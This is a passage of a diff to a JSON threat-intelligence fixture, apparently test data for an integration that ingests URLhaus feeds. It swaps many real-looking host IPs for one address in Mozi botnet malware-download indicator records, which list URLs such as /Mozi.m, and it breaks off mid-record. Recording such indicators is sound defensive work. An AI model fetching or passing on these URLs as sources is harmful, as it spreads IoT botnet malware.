@@ -27080,18 +27080,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.143.46:43105/Mozi.m", + "original": "http://89.160.20.156:43105/Mozi.m", "scheme": "http", "port": 43105, - "domain": "115.63.143.46", - "full": "http://115.63.143.46:43105/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43105/Mozi.m" }, - "ip": "115.63.143.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694579835Z", - "original": "{\"id\":\"960990\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960990/\",\"url\":\"http://115.63.143.46:43105/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.143.46\",\"date_added\":\"2021-01-14 16:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028682900Z", + "original": "{\"id\":\"960990\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960990/\",\"url\":\"http://89.160.20.156:43105/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27129,18 +27129,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.208.36:46011/Mozi.m", + "original": "http://89.160.20.156:46011/Mozi.m", "scheme": "http", "port": 46011, - "domain": "120.85.208.36", - "full": "http://120.85.208.36:46011/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46011/Mozi.m" }, - "ip": "120.85.208.36" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694583461Z", - "original": "{\"id\":\"960984\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960984/\",\"url\":\"http://120.85.208.36:46011/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.208.36\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028688300Z", + "original": "{\"id\":\"960984\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960984/\",\"url\":\"http://89.160.20.156:46011/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27178,18 +27178,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.48.66:51170/Mozi.m", + "original": "http://89.160.20.156:51170/Mozi.m", "scheme": "http", "port": 51170, - "domain": "115.58.48.66", - "full": "http://115.58.48.66:51170/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51170/Mozi.m" }, - "ip": "115.58.48.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694586828Z", - "original": "{\"id\":\"960985\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960985/\",\"url\":\"http://115.58.48.66:51170/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.48.66\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028697900Z", + "original": "{\"id\":\"960985\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960985/\",\"url\":\"http://89.160.20.156:51170/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27227,18 +27227,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.50.229.51:38025/Mozi.a", + "original": "http://89.160.20.156:38025/Mozi.a", "scheme": "http", "port": 38025, - "domain": "115.50.229.51", - "full": "http://115.50.229.51:38025/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38025/Mozi.a" }, - "ip": "115.50.229.51" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694590184Z", - "original": "{\"id\":\"960986\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960986/\",\"url\":\"http://115.50.229.51:38025/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.50.229.51\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028704800Z", + "original": "{\"id\":\"960986\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960986/\",\"url\":\"http://89.160.20.156:38025/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27276,18 +27276,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.213.63:54132/Mozi.m", + "original": "http://89.160.20.156:54132/Mozi.m", "scheme": "http", "port": 54132, - "domain": "115.55.213.63", - "full": "http://115.55.213.63:54132/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54132/Mozi.m" }, - "ip": "115.55.213.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694593580Z", - "original": "{\"id\":\"960987\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960987/\",\"url\":\"http://115.55.213.63:54132/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.213.63\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028711600Z", + "original": "{\"id\":\"960987\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960987/\",\"url\":\"http://89.160.20.156:54132/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27325,18 +27325,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.43.210.102:57705/Mozi.m", + "original": "http://89.160.20.156:57705/Mozi.m", "scheme": "http", "port": 57705, - "domain": "125.43.210.102", - "full": "http://125.43.210.102:57705/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57705/Mozi.m" }, - "ip": "125.43.210.102" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694596856Z", - "original": "{\"id\":\"960988\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960988/\",\"url\":\"http://125.43.210.102:57705/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.210.102\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028718400Z", + "original": "{\"id\":\"960988\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960988/\",\"url\":\"http://89.160.20.156:57705/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27374,18 +27374,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.38.9:32983/Mozi.m", + "original": "http://89.160.20.156:32983/Mozi.m", "scheme": "http", "port": 32983, - "domain": "123.14.38.9", - "full": "http://123.14.38.9:32983/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32983/Mozi.m" }, - "ip": "123.14.38.9" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694600253Z", - "original": "{\"id\":\"960989\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960989/\",\"url\":\"http://123.14.38.9:32983/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.38.9\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028741700Z", + "original": "{\"id\":\"960989\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960989/\",\"url\":\"http://89.160.20.156:32983/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27423,18 +27423,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.254.197.92:47908/Mozi.m", + "original": "http://89.160.20.156:47908/Mozi.m", "scheme": "http", "port": 47908, - "domain": "113.254.197.92", - "full": "http://113.254.197.92:47908/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47908/Mozi.m" }, - "ip": "113.254.197.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694603409Z", - "original": "{\"id\":\"960983\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960983/\",\"url\":\"http://113.254.197.92:47908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"113.254.197.92\",\"date_added\":\"2021-01-14 16:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028748400Z", + "original": "{\"id\":\"960983\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960983/\",\"url\":\"http://89.160.20.156:47908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27472,18 +27472,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.89.245.89:35116/Mozi.m", + "original": "http://89.160.20.156:35116/Mozi.m", "scheme": "http", "port": 35116, - "domain": "113.89.245.89", - "full": "http://113.89.245.89:35116/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35116/Mozi.m" }, - "ip": "113.89.245.89" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694606995Z", - "original": "{\"id\":\"960982\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960982/\",\"url\":\"http://113.89.245.89:35116/Mozi.m\",\"url_status\":\"offline\",\"host\":\"113.89.245.89\",\"date_added\":\"2021-01-14 16:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028755100Z", + "original": "{\"id\":\"960982\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960982/\",\"url\":\"http://89.160.20.156:35116/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27521,18 +27521,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.50.159.25:38070/Mozi.m", + "original": "http://89.160.20.156:38070/Mozi.m", "scheme": "http", "port": 38070, - "domain": "115.50.159.25", - "full": "http://115.50.159.25:38070/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38070/Mozi.m" }, - "ip": "115.50.159.25" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694610372Z", - "original": "{\"id\":\"960978\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960978/\",\"url\":\"http://115.50.159.25:38070/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.159.25\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028761800Z", + "original": "{\"id\":\"960978\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960978/\",\"url\":\"http://89.160.20.156:38070/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27570,18 +27570,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.252.130.226:53399/Mozi.m", + "original": "http://89.160.20.156:53399/Mozi.m", "scheme": "http", "port": 53399, - "domain": "112.252.130.226", - "full": "http://112.252.130.226:53399/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53399/Mozi.m" }, - "ip": "112.252.130.226" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694613608Z", - "original": "{\"id\":\"960979\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960979/\",\"url\":\"http://112.252.130.226:53399/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.252.130.226\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028768500Z", + "original": "{\"id\":\"960979\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960979/\",\"url\":\"http://89.160.20.156:53399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27619,18 +27619,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.30.4.60:39529/Mozi.m", + "original": "http://89.160.20.156:39529/Mozi.m", "scheme": "http", "port": 39529, - "domain": "112.30.4.60", - "full": "http://112.30.4.60:39529/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39529/Mozi.m" }, - "ip": "112.30.4.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694616844Z", - "original": "{\"id\":\"960980\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960980/\",\"url\":\"http://112.30.4.60:39529/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.30.4.60\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028775Z", + "original": "{\"id\":\"960980\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960980/\",\"url\":\"http://89.160.20.156:39529/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27668,18 +27668,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.234.156.209:33465/Mozi.m", + "original": "http://89.160.20.156:33465/Mozi.m", "scheme": "http", "port": 33465, - "domain": "112.234.156.209", - "full": "http://112.234.156.209:33465/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33465/Mozi.m" }, - "ip": "112.234.156.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694620080Z", - "original": "{\"id\":\"960981\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960981/\",\"url\":\"http://112.234.156.209:33465/Mozi.m\",\"url_status\":\"offline\",\"host\":\"112.234.156.209\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028781800Z", + "original": "{\"id\":\"960981\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960981/\",\"url\":\"http://89.160.20.156:33465/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27717,18 +27717,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.44.18:59085/Mozi.m", + "original": "http://89.160.20.156:59085/Mozi.m", "scheme": "http", "port": 59085, - "domain": "59.99.44.18", - "full": "http://59.99.44.18:59085/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59085/Mozi.m" }, - "ip": "59.99.44.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694623266Z", - "original": "{\"id\":\"960977\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960977/\",\"url\":\"http://59.99.44.18:59085/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.44.18\",\"date_added\":\"2021-01-14 16:16:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028790Z", + "original": "{\"id\":\"960977\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960977/\",\"url\":\"http://89.160.20.156:59085/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:16:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27766,18 +27766,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://59.58.148.90:33799/i", + "original": "http://89.160.20.156:33799/i", "scheme": "http", "port": 33799, - "domain": "59.58.148.90", - "full": "http://59.58.148.90:33799/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33799/i" }, - "ip": "59.58.148.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694626482Z", - "original": "{\"id\":\"960976\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960976/\",\"url\":\"http://59.58.148.90:33799/i\",\"url_status\":\"online\",\"host\":\"59.58.148.90\",\"date_added\":\"2021-01-14 16:09:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028796800Z", + "original": "{\"id\":\"960976\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960976/\",\"url\":\"http://89.160.20.156:33799/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:09:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27815,18 +27815,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.142.249:40430/Mozi.m", + "original": "http://89.160.20.156:40430/Mozi.m", "scheme": "http", "port": 40430, - "domain": "59.99.142.249", - "full": "http://59.99.142.249:40430/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40430/Mozi.m" }, - "ip": "59.99.142.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694629798Z", - "original": "{\"id\":\"960972\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960972/\",\"url\":\"http://59.99.142.249:40430/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.142.249\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028803500Z", + "original": "{\"id\":\"960972\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960972/\",\"url\":\"http://89.160.20.156:40430/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27864,18 +27864,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.47.139:43006/Mozi.m", + "original": "http://89.160.20.156:43006/Mozi.m", "scheme": "http", "port": 43006, - "domain": "59.99.47.139", - "full": "http://59.99.47.139:43006/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43006/Mozi.m" }, - "ip": "59.99.47.139" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694633044Z", - "original": "{\"id\":\"960973\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960973/\",\"url\":\"http://59.99.47.139:43006/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.47.139\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028810100Z", + "original": "{\"id\":\"960973\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960973/\",\"url\":\"http://89.160.20.156:43006/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27913,18 +27913,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.157.50.58:33385/Mozi.m", + "original": "http://89.160.20.156:33385/Mozi.m", "scheme": "http", "port": 33385, - "domain": "61.157.50.58", - "full": "http://61.157.50.58:33385/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33385/Mozi.m" }, - "ip": "61.157.50.58" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694636541Z", - "original": "{\"id\":\"960974\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960974/\",\"url\":\"http://61.157.50.58:33385/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.157.50.58\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028816600Z", + "original": "{\"id\":\"960974\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960974/\",\"url\":\"http://89.160.20.156:33385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27962,18 +27962,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.137.157:56649/Mozi.m", + "original": "http://89.160.20.156:56649/Mozi.m", "scheme": "http", "port": 56649, - "domain": "59.99.137.157", - "full": "http://59.99.137.157:56649/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56649/Mozi.m" }, - "ip": "59.99.137.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694640428Z", - "original": "{\"id\":\"960975\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960975/\",\"url\":\"http://59.99.137.157:56649/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.137.157\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028823400Z", + "original": "{\"id\":\"960975\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960975/\",\"url\":\"http://89.160.20.156:56649/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 